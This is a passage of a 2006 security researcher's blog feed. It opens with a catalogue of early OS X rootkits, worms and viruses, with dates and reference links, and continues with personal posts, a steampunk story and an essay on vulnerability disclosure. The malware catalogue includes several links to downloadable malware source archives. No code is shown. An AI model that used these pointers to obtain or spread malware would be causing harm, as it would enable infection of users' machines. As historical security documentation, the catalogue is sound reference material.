Yes, I realize that some of it still probably works fine on OS X under the right circumstances.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Malware:&lt;/span&gt;&lt;br /&gt;"Opener"&lt;br /&gt;01Apr2004~22Oct2004&lt;br /&gt;Rootkit&lt;br /&gt;&lt;a href="http://www.macintouch.com/opener.html"&gt;http://www.macintouch.com/opener.html&lt;br /&gt;&lt;/a&gt;&lt;br /&gt;"osxrk"?&lt;br /&gt;08Sep2004&lt;br /&gt;Rootkit&lt;br /&gt;&lt;a href="http://freaky.staticusers.net/ugboard/viewtopic.php?t=13891"&gt;http://freaky.staticusers.net/ugboard/viewtopic.php?t=13891&lt;br /&gt;&lt;/a&gt;&lt;br /&gt;"Togroot"?&lt;br /&gt;&lt;a href="http://www.oreillynet.com/cs/user/view/cs_msg/72381"&gt;http://www.oreillynet.com/cs/user/view/cs_msg/72381&lt;br /&gt;&lt;/a&gt;&lt;br /&gt;"WeaponX"&lt;br /&gt;~05Nov2004&lt;br /&gt;&lt;a href="http://packetstorm.security-guide.de/filedesc/wX.tar.html"&gt;http://packetstorm.security-guide.de/filedesc/wX.tar.html&lt;br /&gt;&lt;/a&gt;&lt;br /&gt;(Sony Rootkit)&lt;br /&gt;~11Nov2005&lt;br /&gt;Rootkit&lt;br /&gt;&lt;a href="http://www.tuaw.com/2005/11/11/sonys-drm-now-for-macs-too/"&gt;http://www.tuaw.com/2005/11/11/sonys-drm-now-for-macs-too/&lt;br /&gt;&lt;/a&gt;&lt;br /&gt;"Leap-A"&lt;br /&gt;16Feb2006&lt;br /&gt;Trojan/Worm&lt;br /&gt;&lt;a href="http://www.macrumors.com/pages/2006/02/20060216005401.shtml"&gt;http://www.macrumors.com/pages/2006/02/20060216005401.shtml&lt;br /&gt;&lt;/a&gt;&lt;a href="http://www.ambrosiasw.com/forums/index.php?showtopic=102379"&gt;http://www.ambrosiasw.com/forums/index.php?showtopic=102379&lt;br /&gt;&lt;/a&gt;&lt;a href="http://www.symantec.com/security_response/writeup.jsp?docid=2006-021614-4006-99"&gt;http://www.symantec.com/security_response/writeup.jsp?docid=2006-021614-4006-99&lt;br /&gt;&lt;/a&gt;&lt;br /&gt;"Inqtana.A"&lt;br /&gt;22Feb2006&lt;br /&gt;Worm&lt;br /&gt;&lt;a 
href="http://archives.neohapsis.com/archives/fulldisclosure/2006-02/0534.html"&gt;http://archives.neohapsis.com/archives/fulldisclosure/2006-02/0534.html&lt;br /&gt;&lt;/a&gt;&lt;a href="http://www.symantec.com/security_response/writeup.jsp?docid=2006-021715-3051-99"&gt;http://www.symantec.com/security_response/writeup.jsp?docid=2006-021715-3051-99&lt;br /&gt;&lt;/a&gt;Source: &lt;a href="http://www.digitalmunition.com/InqTana-ABC.tgz"&gt;http://www.digitalmunition.com/InqTana-ABC.tgz&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;"Inqtana.B"&lt;br /&gt;22Feb2006&lt;br /&gt;Worm&lt;br /&gt;&lt;a href="http://www.symantec.com/security_response/writeup.jsp?docid=2006-031413-1704-99"&gt;http://www.symantec.com/security_response/writeup.jsp?docid=2006-031413-1704-99&lt;br /&gt;&lt;/a&gt;&lt;a href="http://www.sophos.com/security/analyses/osxinqtanab.html"&gt;http://www.sophos.com/security/analyses/osxinqtanab.html&lt;br /&gt;&lt;/a&gt;Source: &lt;a href="http://www.digitalmunition.com/InqTana-ABC.tgz"&gt;http://www.digitalmunition.com/InqTana-ABC.tgz&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;"Inqtana.C"&lt;br /&gt;22Feb2006&lt;br /&gt;Worm&lt;br /&gt;&lt;a href="http://www.f-secure.com/v-descs/inqtana_c.shtml"&gt;http://www.f-secure.com/v-descs/inqtana_c.shtml&lt;br /&gt;&lt;/a&gt;Source: &lt;a href="http://www.digitalmunition.com/InqTana-ABC.tgz"&gt;http://www.digitalmunition.com/InqTana-ABC.tgz&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;"OSX.Macarena"&lt;br /&gt;02Nov2006&lt;br /&gt;Virus&lt;br /&gt;&lt;a href="http://blogs.securiteam.com/index.php/archives/714"&gt;http://blogs.securiteam.com/index.php/archives/714&lt;br /&gt;&lt;/a&gt;&lt;a href="http://www.symantec.com/enterprise/security_response/writeup.jsp?docid=2006-110217-1331-99&amp;tabid=1"&gt;http://www.symantec.com/enterprise/security_response/writeup.jsp?docid=2006-110217-1331-99&amp;amp;tabid=1&lt;br /&gt;&lt;/a&gt;Source: &lt;a 
href="http://vx.netlux.org/src_view.php?file=machoman.zip"&gt;http://vx.netlux.org/src_view.php?file=machoman.zip&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Not malware:&lt;/span&gt;&lt;br /&gt;&lt;a href="http://apple.slashdot.org/article.pl?sid=06/09/16/182207"&gt;http://apple.slashdot.org/article.pl?sid=06/09/16/182207&lt;br /&gt;&lt;/a&gt;But I put it here for reference.   This is to address the people who want to claim that malware would have to ask for your admin password.   Not that there is any requirement that malware be root, of course.  In the OS X security model, any admin user can write to everything in /Applications.&lt;br /&gt;&lt;br /&gt;InqTana.D&lt;br /&gt;&lt;a href="http://www.digitalmunition.com/hacklu.html"&gt;http://www.digitalmunition.com/hacklu.html&lt;/a&gt;&lt;br /&gt;According to the author, .D is no longer a worm, but is an autorooter.  Unless I have time to look at it later and change my mind, it does not appear to meet my definition of malware.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-2584134807165654776?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/2584134807165654776/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=2584134807165654776' title='12 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/2584134807165654776'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/2584134807165654776'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2006/10/os-x-malware.html' title='OS X Malware'/><author><name>Ryan 
Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>12</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-2690080376621435404</id><published>2006-09-16T14:46:00.000-07:00</published><updated>2006-09-16T14:49:39.206-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='spare brain'/><title type='text'>What makes a good programmer</title><content type='html'>Aha!  I  just found a quote from Joel which puts into words what makes a good programmer.&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;You need training to think of things at multiple levels of abstraction simultaneously, and that kind of thinking is exactly what you need to design great software architecture.&lt;/blockquote&gt;The quote can be found in &lt;a href="http://www.joelonsoftware.com/articles/ThePerilsofJavaSchools.html"&gt;this&lt;/a&gt; blog post.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;I didn't realize it before, but this is what makes the good programmers at BigFix, good.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-2690080376621435404?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/2690080376621435404/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=2690080376621435404' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/2690080376621435404'/><link rel='self' type='application/atom+xml' 
href='http://www.blogger.com/feeds/18579416/posts/default/2690080376621435404'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2006/09/what-makes-good-programmer.html' title='What makes a good programmer'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-6315005860796908189</id><published>2006-09-09T15:47:00.000-07:00</published><updated>2006-11-02T21:44:18.357-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='egoblogging'/><title type='text'>Ruth's Chris Steak House</title><content type='html'>It was my birthday the other day (37.  Thanks for asking.)  I wasn't really into a party or cake or presents or anything, so my wife took me to dinner.   We went to &lt;a href="http://www.ruthschris.com/"&gt;Ruth's Chris Steak House&lt;/a&gt;.  The food and service were both excellent!  It's just a little expensive, though.  It actually ended up being a bit more expensive than we even thought it was going to be, because our waitress misquoted the price on one of the specials about $40 too low.  It wasn't a big deal, and the correct price wasn't really out of line with the rest of the items.  So, two of us, I had the American kobe beef special and the Australian lobster tail special, wife had a filet, we had 3 sides, and cheesecake for dessert (dessert was free, because of the birthday.)&lt;br /&gt;&lt;br /&gt;The total was $192 before tip and valet.  
I wouldn't have spent quite that much on purpose, but man that was good.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-6315005860796908189?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/6315005860796908189/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=6315005860796908189' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/6315005860796908189'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/6315005860796908189'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2006/09/it-was-my-birthday-other-day-37.html' title='Ruth&apos;s Chris Steak House'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-6929584652759367687</id><published>2006-09-09T14:25:00.000-07:00</published><updated>2006-09-09T14:44:05.322-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='egoblogging'/><title type='text'>ELER Mention</title><content type='html'>One of the on-line comic strips I like to read is &lt;a href="http://geekz.co.uk/lovesraymond/"&gt;Everybody Loves Eric Raymond&lt;/a&gt;.  
I got a &lt;a href="http://geekz.co.uk/lovesraymond/archive/bruce-schneier-facts"&gt;mention&lt;/a&gt; there the other day, as "Famous security dude Blue Boar (&lt;a href="http://www.oreillynet.com/pub/au/1321"&gt;Ryan Russell&lt;/a&gt;)".  (Yes, I'll accept that description :) ).&lt;br /&gt;&lt;br /&gt;The comic that day, "Bruce Schneier Facts", is also quite hilarious, as is the database that goes with it.&lt;br /&gt;&lt;br /&gt;He has a "&lt;a href="http://geekz.co.uk/shop/"&gt;Knuth is my homeboy&lt;/a&gt;" t-shirt, which I purchased.  I happen to be wearing it as I type this.  It's just a funny shirt all-around, but you wouldn't enjoy it on as many levels as I do, flavin.&lt;br /&gt;&lt;br /&gt;One reason is that my main character from the "Stealing the Network" series uses "Knuth" as a handle, mostly to piss off the other hackers.  (Which worked pretty well on Fyodor.)  Another reason is because the picture used was taken by &lt;a href="http://ioerror.livejournal.com/"&gt;Jake Appelbaum&lt;/a&gt;, whom I have met a number of times.&lt;br /&gt;&lt;br /&gt;So I wore the shirt to Black Hat one of the days, and had &lt;a href="http://johnny.ihackstuff.com/"&gt;Johnny Long&lt;/a&gt; take a &lt;a href="http://johnny.ihackstuff.com/gallery2/gallery/view_photo.php?set_albumName=Blackhat-Vegas-2006-DEFCON-14&amp;amp;id=DSC02458"&gt;picture&lt;/a&gt; of me in it with &lt;a href="http://blog.labmistress.com/blog/"&gt;Darci&lt;/a&gt; and Jaime.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-6929584652759367687?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/6929584652759367687/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=6929584652759367687' title='3 Comments'/><link rel='edit' 
type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/6929584652759367687'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/6929584652759367687'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2006/09/one-of-on-line-comic-strips-i-like-to.html' title='ELER Mention'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-6554433826688198546</id><published>2006-09-09T14:00:00.000-07:00</published><updated>2006-10-21T14:15:38.322-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='stories'/><title type='text'>Why can't I print this email?</title><content type='html'>Why can't I print this email?&lt;br /&gt;&lt;br /&gt;Many years ago (about 1990-1995) I worked at Bechtel in San Francisco.  It was the kind of place that made you wonder if Dilbert creator &lt;a href="http://dilbertblog.typepad.com/"&gt;Scott Adams&lt;/a&gt; worked there.  So I will likely have a number of stories that are set there, if I can remember them.&lt;br /&gt;&lt;br /&gt;Bechtel was a long-time DEC VAX shop, so we ended up using a lot of strange DEC products, probably long after we should have been.  For example, DEC PathWorks, which was DEC's weird LANMAN-based NETBIOS over DECNet (Phase IV).  We were also using the DEC email product, I want to say it was called "MailWorks", but I can't actually remember.  A lot of their stuff had "works" in the name, I think they were trying to convince themselves.  
And this is back in the day when Windows wasn't a given, and we're talking Windows 3.1x.&lt;br /&gt;&lt;br /&gt;So one of the executives calls the helpdesk, and wants to know why he can't print his email.  We thought that was a little strange, since the printing generally worked well.  We troubleshot the usual queue problems and such, and then sent someone up to see him.  OK, so the problem turned out to be that the print function just wasn't there in the program mode he was in, which was the compose mode.  In other words, he wanted to print the note while he was still typing it up.&lt;br /&gt;&lt;br /&gt;OK, so why did he want to do that, we asked him.  He said he couldn't send it unless he printed it out.  Huh?  Of course he could, just press the "send" button.  And you can even print it out from your "sent" items, if you want.  No, he doesn't want to send it that way, and he needs to print it!&lt;br /&gt;&lt;br /&gt;After backing up several steps, the person finally gets the full story out of him.  What he wanted to do was type it in the compose window, print it out, and then FAX it to the person it was addressed to.  That's right, he just wanted to use the email program as a word processor.&lt;br /&gt;&lt;br /&gt;When questioned as to why he didn't just send it via email, he said that he couldn't be sure it got there that way.  OK, so why is FAX any better?  You can't tell that it got sent for sure that way either.&lt;br /&gt;&lt;br /&gt;Yes you can, he replied.  
You can see the paper going into the machine, so you know it got sent.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-6554433826688198546?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/6554433826688198546/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=6554433826688198546' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/6554433826688198546'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/6554433826688198546'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2006/09/why-cant-i-print-this-email-many-years.html' title='Why can&apos;t I print this email?'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-8592076508687864972</id><published>2006-09-09T13:29:00.000-07:00</published><updated>2006-09-09T13:42:59.019-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='pneumopunk'/><category scheme='http://www.blogger.com/atom/ns#' term='stories'/><title type='text'>Tap Whistle</title><content type='html'>Tap Whistle&lt;br /&gt;&lt;br /&gt;(Originally from a &lt;a href="http://slashdot.org/%7Eryanr/journal/141770"&gt;writing exercise&lt;/a&gt; I did in my &lt;a href="http://slashdot.org/%7Eryanr/journal/"&gt;Slashdot Journal&lt;/a&gt;.  
There's a writer there by the name of &lt;a href="http://slashdot.org/%7Esolemndragon/journal/"&gt;SolemnDragon&lt;/a&gt;, and she occasionally gives out said exercises.  This "universe" is one I've had in mind for a while.  I haven't been satisfied with the level of tech detail in other steampunk stuff I've read.  I may do more in this vein, we'll see.)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Tap Whistle hated to work in the rain. It loosened the black from the streets and buildings, and made the manhole diving unbearable. You didn't want to get caught by the Plumbers when it was raining. If you tried to run, you'd just end up slipping in the black runoff. After a couple of hours of rain like today, the sewers would be full up to your knees.&lt;br /&gt;&lt;br /&gt;It also seeped into the battery jars, and the top layer of grease would short out the 'nodes, leaving you no voltage. Anyway, you didn't want to get caught with a jar if you could help it, or else you would be charged under the Tesla ban.&lt;br /&gt;&lt;br /&gt;The rain made it too noisy to scope the street for audio, too. Not that sound would do him any good at the machine point he planned to monitor today, not from the topside.&lt;br /&gt;&lt;br /&gt;Whistle wouldn't even bother on a day like today, except that he had a rare motivation, a paying customer. It seems that several of the local "plumbers apprentices" had named him as the best when the norm had come around looking to hire a hole diver. He was even more nervous than Whistle, and it made him laugh inside to think how paranoid the norm was about getting caught. Whistle wasn't worried, why not get paid for some of his fun? He suspected he wouldn't be able to get the message anyway.&lt;br /&gt;&lt;br /&gt;Whistle didn't actually have to pop any holes today, so he had left the crowbar at home. This junction point was big enough that it had its own housefront. Most of the major machine points had a little house-like building on top of them. 
The house part was little more than a single-story box with a front door. Inside was just some storage, a wall of valves that ran below, and the circular metal staircase that led down to the workroom. Whistle had a key that he had traded for, that would open the front door. It was a simple warded key, not one of the newer pin tumblers. Those were not thought to be reliable enough, though the lockers considered them more secure. That was about the extent of Whistle's lock knowledge, which he had mostly picked up from trade pamphlets and a couple of informal demos from the lockers at the meetings.&lt;br /&gt;&lt;br /&gt;Whistle checked for any of the copper-clad Plumbers' carriages on the street before letting himself in the door. Once inside with the door closed behind him, he headed straight downstairs.&lt;br /&gt;&lt;br /&gt;At the bottom of the stairs, he stepped right into the water, feeling the cold grip on his calves, dragging at his pant legs. The rain was seeping from the walls, and dripping from the curved ceiling, between the bricks. Parts of the sewers under the city went back to Roman times, though not under a machine point. In a machine point like this, they had typically been dug down two stories worth, and rebuilt, like a mini Underground station in the dark. They didn't carry any trains though, just pipes and conduit.&lt;br /&gt;&lt;br /&gt;Whistle's target today was Lloyd's. They were an old user, so they still mostly used the pneumatics. Usually, only the newer users used rods, because they didn't have as many feeds to convert. There were a couple of exotic hydraulics in town, used in local building carrys, but that was only the standard in America. You wouldn't find a hydraulic in an official machine point. Whistle had a few catalogs from Edison's Hydrologic Manufacturing Company, describing what they had over there.&lt;br /&gt;&lt;br /&gt;He lit the gaslight, and pulled a couple of books from his pack. 
One was the city feed directory, which would give him the numbers he needed to check for. Customers would use these to look up the endpoint and route. The other was a stolen PCL manual, which would give him the stamped numbers he would need to read off the pipe he wanted. He looked up the machine station he was in, and found the list of Lloyd's serials. Lloyd's had mostly low numbers; they had been around longer.&lt;br /&gt;&lt;br /&gt;One challenge was that, through this particular station, Lloyd's had no less than 21 tubes, too many to monitor at once. Whistle knew to check which switch they went to, though. And only one switch down here led to the destination he was supposed to watch for.&lt;br /&gt;&lt;br /&gt;He found that only four of the tubes went through that switch, so that was the set he would have to watch. From his bag he pulled a set of lodestones and reed flags.&lt;br /&gt;&lt;br /&gt;Carefully, he found the places in the middle of the tubes where the plungers would have to cross. The places where, when the plunger went back and forth, it would flip the flag one way and then the other, giving him a visual means of watching the bits. Down here, you could use a horn to listen to one pipe, if you only had one to watch. Well, maybe two. He had heard of one blind kid that could do two at once.&lt;br /&gt;&lt;br /&gt;For a lot of beginners, tapping by ear was easier. Especially if you were used to decoding by ear at a legitimate endpoint anyway.&lt;br /&gt;&lt;br /&gt;But that didn't help if you needed to watch four. Whistle set up the reeds so that the reflective sides were to the right, where the gaslight was. 
Once the plunger started going, the flashes would let him read the message right off the pipe.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-8592076508687864972?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/8592076508687864972/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=8592076508687864972' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/8592076508687864972'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/8592076508687864972'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2006/09/tap-whistle-orginally-from-writing.html' title='Tap Whistle'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-4266976801361007334</id><published>2006-09-04T12:28:00.000-07:00</published><updated>2006-11-01T18:23:32.050-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='OS X sucks'/><category scheme='http://www.blogger.com/atom/ns#' term='secphil'/><title type='text'></title><content type='html'>When, where, how and for how much, to reveal your vulnerability&lt;br /&gt;&lt;br /&gt;You know, I can do these long logic chains based on a lot of assumptions as well.  
Can I get some vitriol?&lt;br /&gt;&lt;br /&gt;So, you're a researcher, and you've got some sexy new class of exploitable flaws you've found.  You do your presentation at con, but it seems like everyone's employers nowadays don't appreciate presenters dropping 0-day.  Therefore, you decide to show a video clip instead.&lt;br /&gt;&lt;br /&gt;You decide to playfully pick on a group of smug OS users who generally think they are more secure.  (I know.  Security researchers bursting the bubble of someone with a false sense of security?  I'm shocked too.)&lt;br /&gt;&lt;br /&gt;Trying hard to be "responsible" (as defined by the software vendors), you give the vendor some heads up that you're going to be showing a video demo of yourself 0wning their kernel driver.  Lo! This vendor, who happens to actively cultivate this perception that their stuff is more secure, takes exception.&lt;br /&gt;&lt;br /&gt;Let's talk about this particular software vendor for a sec.  They have repeatedly demonstrated a willingness to sue anyone who reveals anything they aren't ready to reveal.  They are willing to sue every time.  Even if it's true.  To the point where you might have to take them to the state supreme court to try and keep them from going after your sources.&lt;br /&gt;&lt;br /&gt;Of course, that's for news, which theoretically has some constitutional protection in the U.S.  How do they feel about &lt;a href="http://news.com.com/2100-1002_3-6063931.html"&gt;vulnerability disclosure&lt;/a&gt;?  "We don't feel that our customers are better served by public disclosure of potential issues".  Oh.&lt;br /&gt;&lt;br /&gt;So, maybe picking on Darth Litigious isn't such a hot idea.  They decide to instead demo one of the third-party cards with its own vulnerable driver.  And not even identify the card, so that vendor can't complain either.  
Yeah, it kind of weakens their demo, but they don't have a lot of choice.&lt;br /&gt;&lt;br /&gt;Maybe they could just mention in passing that the sue-happy vendor's built-in card and driver have similar problems?&lt;br /&gt;&lt;br /&gt;Surely, the masses won't ignore the impressive 802.11 research presented that made up 80% of the talk, and only focus on the demo?  And pick the demo to death only because it affected their favorite platform?  Surely, it can't be possible that rational, sane people would believe that the problem is demonstrable on &lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0226"&gt;FreeBSD&lt;/a&gt;, &lt;a href="http://lists.immunitysec.com/pipermail/dailydave/2006-September/003463.html"&gt;Windows&lt;/a&gt;, and even their own platform, but with a third-party driver... and then not believe that there is any chance whatsoever that the same kind of problem exists on the driver that ships with the OS?&lt;br /&gt;&lt;br /&gt;No, clearly, the researchers must have faked the video.  It seems MUCH more likely that they would use a third-party card ONLY as a red herring.  Not because the OS vendor breaks out the lawyers at the drop of a hat.  No, they faked the video, and they didn't show themselves popping the native card because, well... that's more believable.  Or something.&lt;br /&gt;&lt;br /&gt;So, clearly the zealots were right all along, the researchers are frauds.  Wasn't it stupid of them to get up in front of all their friends and peers, and pull a scam?  Especially since at least one of them had proven himself more than competent over the years.  Oh well, no accounting for stupidity.&lt;br /&gt;&lt;br /&gt;But zealots are rarely willing to let things go at victory.  No, how about the zealots taunt the researchers with promises of prizes, on the off chance that the researchers have something to actually show?  Maybe all they were waiting for was a shiny thing.  
And not the threat of lawsuit.&lt;br /&gt;&lt;br /&gt;Let's examine the offer from the zealot.&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Zealot will buy said vulnerable (Ha!  As if!) shiny thing&lt;/li&gt;&lt;li&gt;Zealot will not permit researchers to put their filthy paws on the shiny thing&lt;/li&gt;&lt;li&gt;Researchers will use their exploit, which they have promised to keep private until the patch is out&lt;/li&gt;&lt;li&gt;If the exploit doesn't work flawlessly on the first try, then researchers will either have to give the zealot the cost of the shiny thing, or it will be called "even".  Where "even" is the researchers have to pay no money, but zealot will crow about victory, and researchers will have proven themselves untrustworthy by using the exploit they said they would keep private, and maybe get sued.&lt;/li&gt;&lt;li&gt;However, if it does work flawlessly, the researchers will be up one shiny thing, and will only have proven themselves untrustworthy, and maybe get sued.  Plus, zealot will have some excuse as to why it doesn't matter because, well, whatever, nuh-uh!&lt;/li&gt;&lt;li&gt;All judging will be done by zealot, who would be out the cost of one shiny thing, and prove himself completely wrong if he declares the researchers the winners.&lt;br /&gt;&lt;/li&gt;&lt;/ul&gt; So, back to my opening question, if you're a researcher in this position.  You've got this sexy vuln, what do you do with it?  Here are some options:&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Ignore any potential gain from your work, don't present it, sell it, use it as a resume item, etc... just post it, and take a chance the vendor will be really mad about that.  Tick off potential employers.  Anger some peers who think that is irresponsible.&lt;/li&gt;&lt;li&gt;Sell it.  TippingPoint and iDefense will offer $10,000 or more.  That's like, enough for 9 shiny things!  
Note that you will be required to keep the exploit private until the patch ships.&lt;/li&gt;&lt;li&gt;Present it and try and warn people about this class of problem.  (Also, you get some travel expenses, and maybe enough money for 1 shiny thing.  Woo!)  Note that this does not necessarily prevent you from releasing the exploit if you want.  Unless maybe your employer paid for some of your time, and insists that you don't.  Or maybe your peers and potential employers and customers wouldn't like that.  Or maybe the conference itself got sued for that sort of thing last year, and it wouldn't be cool.&lt;/li&gt;&lt;li&gt;Unless you tried to be nice to the vendor by giving them some advance notice, who then turns around and makes you change your presentation and hold your tongue.  Even if they later issue a public half-denial that they know about the problem.  Because, you know that presenters and conferences get sued for that kind of thing now...&lt;/li&gt;&lt;/ul&gt;So, the holding all details until a patch is released strategy looks like a pretty good choice.  The researchers probably would have had more options if they hadn't tried to give any vendors advance notice, but it's a bit late for that now.&lt;br /&gt;&lt;br /&gt;Maybe the vendor is trying really hard to communicate to the researchers that the best strategy is to just blindside the vendor?  Maybe they like a challenge.&lt;br /&gt;&lt;br /&gt;In case it's not obvious, I don't believe that David and Johnny faked anything.  They are being really big about the whole thing, despite taunts, derision and bribes.  I believe they will be proven correct when Apple puts out the patch (which is, of course, completely on Apple's schedule.)  
And I also believe that the same people who are calling them frauds now will probably still be grasping at any little detail which might help them keep from admitting they were wrong.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-4266976801361007334?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/4266976801361007334/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=4266976801361007334' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/4266976801361007334'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/4266976801361007334'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2006/09/when-where-how-and-for-how-much-to.html' title=''/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' 